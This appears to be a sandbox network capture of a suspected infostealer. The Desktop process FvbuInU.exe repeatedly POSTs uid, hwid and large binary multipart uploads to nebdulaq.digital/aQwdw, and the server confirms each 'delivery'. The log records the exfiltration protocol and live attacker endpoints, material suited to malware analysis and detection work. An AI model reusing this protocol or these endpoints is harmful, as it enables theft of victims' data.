2025-03-07 18:37:32 UTC	1369	IN	Data Raw: fe d3 52 3e be 13 96 b9 ee 9d 4e 36 5e d6 c8 d2 8a a9 97 94 d2 2a 84 97 db 61 d7 6e 0d ad b3 6a 70 a6 43 2a 7a 3e 0b a3 4a 8d 0f a0 69 be 22 30 da fc 15 10 54 f8 ca 19 d5 02 9c ef 2e b1 0a f7 81 ff 5c fd 01 87 d2 99 4b a3 22 5c 0b 19 99 74 48 db f7 bf 6a 4b 68 35 34 6c 35 29 f9 9f c3 83 42 9b c9 25 a1 bb 7c 94 c8 c2 14 2b 01 81 49 89 ec 4b 24 88 e7 f2 45 93 7b fb 13 72 61 4c 2a 18 ed 72 8b 21 1e 96 82 a5 c4 52 0e 99 99 54 51 5b 1e b0 5b bc b6 7e ee ef 0b 78 5f 42 a6 ce c9 1d cf 06 36 3b 37 28 97 eb ed 19 b5 12 76 8e ab 98 17 d3 af 9e 24 48 df fd 3e fa ef 26 7c 5b ef 01 89 05 be a4 d2 a7 4e 08 91 b6 0c fb 97 dd b9 ca 7e 30 51 0b 48 51 21 7c 40 e7 51 31 56 0d f1 84 db b0 a2 c3 f7 43 ba 10 92 6e da d8 f1 56 2a 25 37 01 df e2 80 4d 84 45 d5 a9 8c c5 f2 36 93 Data Ascii: R>N6^anjpCz>Ji"0T.\K"\tHjKh54l5)B%\|+IK$E{raLr!RTQ[[~x_B6;7(v$H>&\|[N~0QHQ!\|@Q1VCnV%7ME6
2025-03-07 18:37:32 UTC	1369	IN	Data Raw: 15 0e 95 ad 88 28 36 3c 0c 85 b3 97 8e 4f 15 7c 85 27 6b c5 61 36 6b 8c 17 c5 df a0 93 36 2f be f0 03 f6 20 c2 a2 66 4c b4 5e 43 eb 1d b1 01 5a 33 9a 98 cb 1e b2 c6 e7 e2 9f 3b 53 42 e8 a3 79 c8 1c 89 74 9d a9 07 81 d7 38 f1 89 9c f4 f0 15 40 2c d3 c7 ce f9 95 a2 5d 1e e8 eb f0 f3 b2 f8 69 66 19 79 7a 50 c0 ee d5 53 d3 38 42 83 64 fd bc 24 97 20 95 ba 30 1e d6 04 7c 59 f2 e3 fa f9 d1 ac 6a 33 02 e6 7b 2d c1 8d a3 8b cf 92 2b 74 e8 bf 12 d9 a8 22 37 9c 1d 29 a8 36 df 4e b1 6d 8d eb 69 45 37 d5 c7 59 17 a9 06 62 ce c9 50 50 81 59 4f dc 4c fe dd de d7 39 1c 66 22 6f 9c b3 72 eb 6d df 56 36 32 dd ef b3 d0 5c 15 a5 34 dc 70 af 2e 88 7e 40 c3 12 7b d7 92 2a 8b b0 70 c4 91 47 85 77 2b e6 ea 89 ef 6b e0 96 84 20 78 98 de 26 e8 86 75 39 98 3c 22 ee a9 c2 59 8a 6a Data Ascii: (6<O\|'ka6k6/ fL^CZ3;SByt8@,]ifyzPS8Bd$ 0\|Yj3{-+t"7)6NmiE7YbPPYOL9f"ormV62\4p.~@{*pGw+k x&u9<"Yj
2025-03-07 18:37:32 UTC	1369	IN	Data Raw: fd 30 bb e3 23 79 ed e7 46 81 f8 ea 85 13 6d 75 fb a4 56 3b c3 7d 38 91 00 aa aa 83 40 3d 4e 3c 5d 21 6a f5 ef 93 d7 90 20 21 d8 7a 23 2d 45 c3 05 c6 86 5e 79 a5 4f 23 c8 10 a3 1f 35 2f f3 24 0a c6 dd 5b 8a ef a1 cf 7a 64 18 5a 91 8e 80 7d f8 4a d4 ad 42 24 91 e4 1c 6b cc 81 01 e7 11 da b7 a7 1e 63 60 90 68 11 24 22 55 c5 ed 36 95 ef cb f7 9e 5a 8d fd b8 73 f6 30 04 95 d7 42 37 f3 28 be cf c0 52 89 d9 b4 2f 4d 82 92 77 12 e5 9a 23 df 8a ee db 7e 8f 3c 30 a0 18 76 e8 18 64 52 22 65 f3 4c f5 9b 22 a3 0f 9d 44 0d fd 2a e7 2a 4e 65 48 71 57 fa 17 78 cb 3d 37 bb df 7c 0a d3 54 8f d9 3a 72 87 12 11 e1 e2 b0 50 ab e7 09 5f 38 05 c2 39 3a c2 f0 5d 39 87 ee 15 61 eb 97 ac 58 2d 2f 8d 7b b0 42 db 0b 34 84 88 59 19 ff a8 23 1c 3e ed 65 10 94 e1 5b 44 ff c2 b7 e0 63 Data Ascii: 0#yFmuV;}8@=N<]!j !z#-E^yO#5/$[zdZ}JB$kc`h$"U6Zs0B7(R/Mw#~<0vdR"eL"D**NeHqWx=7\|T:rP_89:]9aX-/{B4Y#>e[Dc
2025-03-07 18:37:32 UTC	1369	IN	Data Raw: e1 f2 76 ee 8e 22 bd b3 34 f3 8e 4d c8 54 e8 47 e2 1f 39 0f 0c 49 39 c6 cb 46 c7 35 a9 f5 10 d0 b6 1d e8 79 31 4b 6a 93 ea 33 4d d4 91 40 72 d8 4f 76 42 42 d2 4a 81 2a fc 24 91 8a 59 06 6e 42 a0 5d 2b 41 7c 90 2a 23 c2 e1 0f 0f 95 27 58 83 89 c7 cd d0 97 a4 85 8f b4 37 83 67 19 3f 31 51 82 10 f3 04 ac c8 36 44 79 89 f0 70 ad 28 b2 59 8a 84 3f a1 6d e7 11 b4 3d 40 95 77 49 a3 5c ba cc 93 4c fd 7d 58 c8 8a a3 65 c4 06 df cb 98 f5 f8 58 94 25 ac 83 fc 6d 9e 9a 85 73 5c 6b 44 bb c1 e2 c5 7f 24 46 15 0a 3e 7d 65 26 5b a9 75 c8 86 ac ce d4 61 1c 0f d0 f3 c2 7d 6d d7 4b 80 d9 30 ee e6 36 c6 f9 5e 31 68 89 37 d1 c1 24 22 74 14 bf d6 04 22 76 87 4e c0 b6 49 f0 a4 eb 8a ad d4 a3 f1 75 7c 71 64 fe 66 9e ef dc d8 3d 6d 30 80 91 3e a3 4c 30 62 a3 54 ca 32 9e 23 a5 ec Data Ascii: v"4MTG9I9F5y1Kj3M@rOvBBJ$YnB]+A\|#'X7g?1Q6Dyp(Y?m=@wI\L}XeX%ms\kD$F>}e&[ua}mK06^1h7$"t"vNIu\|qdf=m0>L0bT2#

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49688	104.21.53.52	443	7544	C:\Users\user\Desktop\FvbuInU.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-07 18:37:36 UTC	276	OUT	POST /aQwdw HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=RX3IfGZa8M User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 14875 Host: nebdulaq.digital
2025-03-07 18:37:36 UTC	14875	OUT	Data Raw: 2d 2d 52 58 33 49 66 47 5a 61 38 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 39 63 33 62 65 36 66 34 63 35 65 30 61 39 34 62 31 38 39 63 61 30 64 38 32 39 39 66 33 35 66 64 37 39 34 34 38 38 0d 0a 2d 2d 52 58 33 49 66 47 5a 61 38 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 52 58 33 49 66 47 5a 61 38 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 36 39 32 30 37 44 35 32 32 32 45 44 41 36 37 45 33 45 44 43 45 41 37 37 38 33 36 38 45 33 Data Ascii: --RX3IfGZa8MContent-Disposition: form-data; name="uid"9c3be6f4c5e0a94b189ca0d8299f35fd794488--RX3IfGZa8MContent-Disposition: form-data; name="pid"2--RX3IfGZa8MContent-Disposition: form-data; name="hwid"D69207D5222EDA67E3EDCEA778368E3
2025-03-07 18:37:38 UTC	817	IN	HTTP/1.1 200 OK Date: Fri, 07 Mar 2025 18:37:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ihAiEDzw2xob%2BHaY7FRne11nbQSZiMd7zrvCZds0rGxXS7pJT%2FriW3rONKaAhH8Zb3tjUvEIAXVt%2FBQjNhSZ8qIHQBlVESBcMpfrg7jTYYxfC3EEjt4io8lt2xyIUM%2B%2FlAri"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91cc3481a86998b9-ORD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1373&min_rtt=1373&rtt_var=515&sent=11&recv=18&lost=0&retrans=0&sent_bytes=2840&recv_bytes=15809&delivery_rate=2879825&cwnd=252&unsent_bytes=0&cid=81d5f1041cb2fb00&ts=1767&x=0"
2025-03-07 18:37:38 UTC	76	IN	Data Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 31 33 38 2e 31 39 39 2e 34 32 2e 31 36 34 22 7d 7d 0d 0a Data Ascii: 46{"success":{"message":"message success delivery from 138.199.42.164"}}
2025-03-07 18:37:38 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49689	104.21.53.52	443	7544	C:\Users\user\Desktop\FvbuInU.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-07 18:37:41 UTC	276	OUT	POST /aQwdw HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=vfAsqCzce7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15056 Host: nebdulaq.digital
2025-03-07 18:37:41 UTC	15056	OUT	Data Raw: 2d 2d 76 66 41 73 71 43 7a 63 65 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 39 63 33 62 65 36 66 34 63 35 65 30 61 39 34 62 31 38 39 63 61 30 64 38 32 39 39 66 33 35 66 64 37 39 34 34 38 38 0d 0a 2d 2d 76 66 41 73 71 43 7a 63 65 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 76 66 41 73 71 43 7a 63 65 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 36 39 32 30 37 44 35 32 32 32 45 44 41 36 37 45 33 45 44 43 45 41 37 37 38 33 36 38 45 33 Data Ascii: --vfAsqCzce7Content-Disposition: form-data; name="uid"9c3be6f4c5e0a94b189ca0d8299f35fd794488--vfAsqCzce7Content-Disposition: form-data; name="pid"2--vfAsqCzce7Content-Disposition: form-data; name="hwid"D69207D5222EDA67E3EDCEA778368E3
2025-03-07 18:37:42 UTC	811	IN	HTTP/1.1 200 OK Date: Fri, 07 Mar 2025 18:37:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xshGdnXpSwtbUqjlTY%2BzWocwyohuDVRBFO6avEefeRn0wlCdHH5XiAruLrs6xiTr8Fc%2BBBgBdSEt2VATbXlfcFwlgwDmCbRpHYu6TAIX0XhfNZ7ahaxue3uCnnjxPqpDUHES"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91cc349e9fdf1aeb-ORD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1166&min_rtt=1141&rtt_var=446&sent=11&recv=18&lost=0&retrans=0&sent_bytes=2841&recv_bytes=15990&delivery_rate=3465381&cwnd=252&unsent_bytes=0&cid=ddb9ee57058e8d0a&ts=1671&x=0"
2025-03-07 18:37:42 UTC	76	IN	Data Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 31 33 38 2e 31 39 39 2e 34 32 2e 31 36 34 22 7d 7d 0d 0a Data Ascii: 46{"success":{"message":"message success delivery from 138.199.42.164"}}
2025-03-07 18:37:42 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49690	104.21.53.52	443	7544	C:\Users\user\Desktop\FvbuInU.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-07 18:37:46 UTC	283	OUT	POST /aQwdw HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=QQBZoM6TdV2vZ1kvP User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 19948 Host: nebdulaq.digital
2025-03-07 18:37:46 UTC	15331	OUT	Data Raw: 2d 2d 51 51 42 5a 6f 4d 36 54 64 56 32 76 5a 31 6b 76 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 39 63 33 62 65 36 66 34 63 35 65 30 61 39 34 62 31 38 39 63 61 30 64 38 32 39 39 66 33 35 66 64 37 39 34 34 38 38 0d 0a 2d 2d 51 51 42 5a 6f 4d 36 54 64 56 32 76 5a 31 6b 76 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 51 51 42 5a 6f 4d 36 54 64 56 32 76 5a 31 6b 76 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 36 39 32 30 37 44 35 32 32 Data Ascii: --QQBZoM6TdV2vZ1kvPContent-Disposition: form-data; name="uid"9c3be6f4c5e0a94b189ca0d8299f35fd794488--QQBZoM6TdV2vZ1kvPContent-Disposition: form-data; name="pid"3--QQBZoM6TdV2vZ1kvPContent-Disposition: form-data; name="hwid"D69207D522
2025-03-07 18:37:46 UTC	4617	OUT	Data Raw: eb f6 89 14 b7 46 f7 45 72 72 63 ea 36 90 25 88 51 ad 1d f2 9a 1b 17 dc 1e 61 a4 49 70 93 8d 1d 43 75 f6 f4 f3 9a db 15 ba eb ff 1c 26 fb 57 ce 32 9a 7e 7d 50 bd d6 eb e5 9b 12 1e 14 79 21 12 9e b3 a2 04 df 65 ec 86 51 72 2b 21 53 d9 57 c4 7e 98 f1 fa 68 9b 1e d4 3c fd 27 50 c3 34 74 54 62 9b 21 c0 2f 3c 8d 8c 43 82 e5 ea 8c 66 19 f8 22 9b c3 d3 65 f9 29 2c 92 8b b1 0a b3 d1 6b 79 a8 f7 3e ae 5f 80 ca 47 c7 72 36 00 82 2b 71 42 e1 f5 ba 46 80 88 a3 63 67 22 0f 25 02 c6 ac c1 e3 f3 bb dc 64 fd c5 e1 2c 90 83 02 cb 0d 14 1f 24 f5 8f 0e 49 41 06 29 92 9d 88 92 9f 5f 6c 1c 50 ac e7 ea 6c 91 3f 1d 2c 9f b3 2b 9e e8 a0 f6 7c 5b 24 52 dc b6 21 4d 8b c4 5b 83 00 53 6e 1a 1f 4f 11 12 5b 38 2a bb a2 4c b9 2f ee be 9e cd 31 6f ac 1c 09 e4 cc 7a a9 23 f0 81 09 ed b4 Data Ascii: FErrc6%QaIpCu&W2~}Py!eQr+!SW~h<'P4tTb!/<Cf"e),ky>_Gr6+qBFcg"%d,$IA)_lPl?,+\|[$R!M[SnO[8*L/1oz#
2025-03-07 18:37:47 UTC	823	IN	HTTP/1.1 200 OK Date: Fri, 07 Mar 2025 18:37:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=knS7czeuF%2BdUkheJc9t0gJXNDJjNEN9%2BwjRu93hkRgsVvV2rnuzlIj0X%2BWA8SGsyW0I5Ts1HnlDqxt%2F4GkzLK%2FjqNJlxTOj3rTR%2FLpkklZ%2F4%2FOzqsrLfhSNQeY267M5hz6%2Ba"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91cc34bd5de08723-ORD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=586&min_rtt=585&rtt_var=223&sent=14&recv=23&lost=0&retrans=0&sent_bytes=2840&recv_bytes=20911&delivery_rate=6601001&cwnd=252&unsent_bytes=0&cid=8ac79774c131e36d&ts=1432&x=0"
2025-03-07 18:37:47 UTC	76	IN	Data Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 31 33 38 2e 31 39 39 2e 34 32 2e 31 36 34 22 7d 7d 0d 0a Data Ascii: 46{"success":{"message":"message success delivery from 138.199.42.164"}}
2025-03-07 18:37:47 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49691	104.21.53.52	443	7544	C:\Users\user\Desktop\FvbuInU.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-07 18:37:52 UTC	277	OUT	POST /aQwdw HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=9XD6Apa4PxGA User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 2530 Host: nebdulaq.digital
2025-03-07 18:37:52 UTC	2530	OUT	Data Raw: 2d 2d 39 58 44 36 41 70 61 34 50 78 47 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 39 63 33 62 65 36 66 34 63 35 65 30 61 39 34 62 31 38 39 63 61 30 64 38 32 39 39 66 33 35 66 64 37 39 34 34 38 38 0d 0a 2d 2d 39 58 44 36 41 70 61 34 50 78 47 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 39 58 44 36 41 70 61 34 50 78 47 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 36 39 32 30 37 44 35 32 32 32 45 44 41 36 37 45 33 45 44 43 45 41 37 37 Data Ascii: --9XD6Apa4PxGAContent-Disposition: form-data; name="uid"9c3be6f4c5e0a94b189ca0d8299f35fd794488--9XD6Apa4PxGAContent-Disposition: form-data; name="pid"1--9XD6Apa4PxGAContent-Disposition: form-data; name="hwid"D69207D5222EDA67E3EDCEA77
2025-03-07 18:38:13 UTC	247	IN	HTTP/1.1 522 <none> Date: Fri, 07 Mar 2025 18:38:12 GMT Transfer-Encoding: chunked Connection: close Server: cloudflare Cache-Control: private, no-store Cf-Cache-Status: DYNAMIC CF-RAY: 91cc34e78840231e-ORD alt-svc: h3=":443"; ma=86400
2025-03-07 18:38:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49694	104.21.53.52	443	7544	C:\Users\user\Desktop\FvbuInU.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-07 18:38:15 UTC	281	OUT	POST /aQwdw HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=p56hhj6bi9XWGA User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 588308 Host: nebdulaq.digital
2025-03-07 18:38:15 UTC	15331	OUT	Data Raw: 2d 2d 70 35 36 68 68 6a 36 62 69 39 58 57 47 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 39 63 33 62 65 36 66 34 63 35 65 30 61 39 34 62 31 38 39 63 61 30 64 38 32 39 39 66 33 35 66 64 37 39 34 34 38 38 0d 0a 2d 2d 70 35 36 68 68 6a 36 62 69 39 58 57 47 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 70 35 36 68 68 6a 36 62 69 39 58 57 47 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 36 39 32 30 37 44 35 32 32 32 45 44 41 36 37 45 33 45 Data Ascii: --p56hhj6bi9XWGAContent-Disposition: form-data; name="uid"9c3be6f4c5e0a94b189ca0d8299f35fd794488--p56hhj6bi9XWGAContent-Disposition: form-data; name="pid"1--p56hhj6bi9XWGAContent-Disposition: form-data; name="hwid"D69207D5222EDA67E3E
2025-03-07 18:38:15 UTC	15331	OUT	Data Raw: 5f 0e aa c8 94 1f 49 a2 f7 5b 79 f2 91 d4 e9 c2 da bc 4b 7a d8 03 3f 62 e7 df 05 9b b6 22 10 95 b7 fe 7a 73 33 37 41 38 36 4e e1 97 ca 28 85 c5 14 cb 4c a9 7a 9b e1 41 12 80 06 28 d8 7c 48 b8 a4 59 b2 a8 27 8e 05 e3 35 02 02 b4 bd 1f 2e ae 58 4f b8 e0 c7 3e eb 5b 8d 58 b7 46 75 99 f6 0b c0 58 3d 18 20 30 13 42 66 58 80 ce 6b 48 22 ce 3c 74 97 19 42 9d f3 9b 7f cc 5a 16 f4 6f 0f 10 9a a9 d8 09 1d 10 7e 9e 26 d2 e2 6f ff 51 69 fa 68 a5 6a 9f e1 97 d1 e8 68 13 b2 6d cf 66 89 a6 1b 20 a7 32 c5 ec 26 68 d8 c8 8e e3 8e b5 6c f1 25 8c 59 f9 09 be 48 76 37 ac 76 41 73 80 a8 79 3f 0c 47 17 40 ff ba ea 0c 18 46 65 b0 56 95 ea ac cc 19 87 6e 07 3a c1 f4 a5 5c 04 cc 5f ae a0 2c e7 68 1a cd 61 ef ef 36 2c a8 b9 df 1a c3 d2 e8 9a 2e 10 b5 34 64 63 61 2d f1 bf 3c 75 43 Data Ascii: _I[yKz?b"zs37A86N(LzA(\|HY'5.XO>[XFuX= 0BfXkH"<tBZo~&oQihjhmf 2&hl%YHv7vAsy?G@FeVn:\_,ha6,.4dca-<uC
2025-03-07 18:38:15 UTC	15331	OUT	Data Raw: 70 81 a3 71 8c 77 b4 ea 4b 8a 2b c6 09 dc 3c c2 16 2e e5 7a 9d 6b 83 5f 54 5e ff bc ae b2 1f 1e f3 72 48 a9 41 3a 38 c3 95 72 c9 1e a4 99 1c 69 81 b0 10 f3 51 71 2f da bb f7 e4 a7 25 90 73 e7 7a 43 7c 92 e2 b1 0a b9 ad 6b bc 21 15 36 51 8a de 39 75 38 5f b9 25 05 f4 c7 9f db f6 78 1c 0a 46 0d 5f aa d2 0a 0a 59 19 70 e8 21 30 32 df 3e 14 b6 8d f8 ed 07 cd 15 69 c5 2c 7c 93 35 2e c5 68 ae e9 bc 69 b1 d4 b4 c7 e9 21 45 cc 94 52 a3 37 1b e8 96 24 08 c2 47 70 c6 fb 6b 8e 82 71 3c b3 96 e6 7f 06 75 0e 2e 0d 74 cf bd 82 3d 5c a8 58 20 a1 09 f1 a1 4f e3 47 cd e8 00 a5 3b f6 c2 d5 32 9e d0 c7 2d 94 a8 e0 0e e2 90 cf b5 24 4e bc 56 43 bf fb b1 34 1f 5b 7f e3 ca 46 f5 3a b3 38 db 82 7d 96 ee e8 1c 06 1b 4c 97 90 79 6f c5 12 a2 2b af 6d 51 c6 8f a8 f5 e9 10 ae ea c8 Data Ascii: pqwK+<.zk_T^rHA:8riQq/%szC\|k!6Q9u8_%xF_Yp!02>i,\|5.hi!ER7$Gpkq<u.t=\X OG;2-$NVC4[F:8}Lyo+mQ
2025-03-07 18:38:15 UTC	15331	OUT	Data Raw: 7c bd 52 1a e3 4c 46 52 0a 27 74 04 8d 55 ce 5f 06 0b 26 90 32 81 e4 05 89 74 4a aa 15 e6 8f cb b9 b6 58 24 b4 96 12 c3 a8 7a e4 a3 7f 32 27 78 54 5e b9 2e 89 0d 09 68 19 6f 1e 48 9f 82 2f 0e 91 91 b2 5b 50 b0 d9 13 d8 5d fa 55 e7 9e 0a 4c 29 c3 99 d3 29 e7 cc 68 3f da 73 2b 95 18 87 b7 f2 5c fd a0 1a 90 78 55 37 d5 d4 bf c8 67 ea fa 53 c5 ce 21 df ff 5c 62 03 eb 1e 3f c8 d1 0a 27 f1 cd 6a 40 49 12 19 eb e9 dc 1f 73 3d 39 be 26 f9 c6 99 fc 64 72 0e 48 6d 87 87 a6 70 bf 8f fe fa a5 84 8d 6c 1a 04 d4 f4 43 02 82 2d 3a 8e 12 ce da ef b9 b3 c8 a1 3e 91 c4 4b bf 04 b0 54 59 b0 69 ed 04 bb ec eb 32 4e 47 d9 65 e6 5e 50 73 cd a8 11 5e b9 69 ef c5 d0 ea 0e 90 77 64 19 d0 ff 32 d5 cb 89 34 42 ca 7e fa 99 73 17 4a 6e bd 9d 4f 4a eb bb 9c 4d 42 5b 6b b5 99 c2 b7 1a Data Ascii: \|RLFR'tU_&2tJX$z2'xT^.hoH/[P]UL))h?s+\xU7gS!\b?'j@Is=9&drHmplC-:>KTYi2NGe^Ps^iwd24B~sJnOJMB[k
2025-03-07 18:38:15 UTC	15331	OUT	Data Raw: ca ae 0e 42 39 d4 5b 2d 96 8b 8b cd 40 ad 6a 30 ec e8 17 0d a3 42 07 a0 e3 7f e0 b6 b1 e8 9d 8a 69 15 da 9b 18 7e 16 65 b9 89 0b 10 be 82 26 f7 cc 16 d1 8a 01 6d bd 28 8f be 6e 72 3e 44 c3 3b 69 47 3e 54 3d 97 14 4b aa 70 a9 77 43 cc d4 c5 c4 98 ce 98 91 0e 99 02 e3 75 6e b6 54 c4 4b da 04 83 74 67 6f 78 05 b8 a4 54 2c 98 f1 dd 6f 51 14 46 35 bb 69 8e 24 59 6a ec 06 88 ac d6 c4 d8 0d b8 3a 3e 9a f8 49 b8 d8 06 95 2a d5 ff 31 5b f4 1e 4c 5b 91 10 72 f9 4b 83 ef aa 96 1c 45 c3 fd 92 aa 79 bb af 3a 68 42 a8 d1 46 27 1c 62 e1 b5 59 5a 06 07 3a db 69 c6 74 3a 1d c0 6d e6 a1 e8 20 26 71 7e 5c 92 54 04 84 c2 74 e8 09 e3 7b b8 06 fa d0 85 e3 40 54 28 bb 95 32 1d fa f3 fd af 0d ce 89 73 de 0a 69 ee 8a 5c 14 99 e0 82 ee 7d e3 e7 0e 3b f9 9b 16 04 99 f6 4c 5c 5e 5c Data Ascii: B9[-@j0Bi~e&m(nr>D;iG>T=KpwCunTKtgoxT,oQF5i$Yj:>I*1[L[rKEy:hBF'bYZ:it:m &q~\Tt{@T(2si\};L\^\
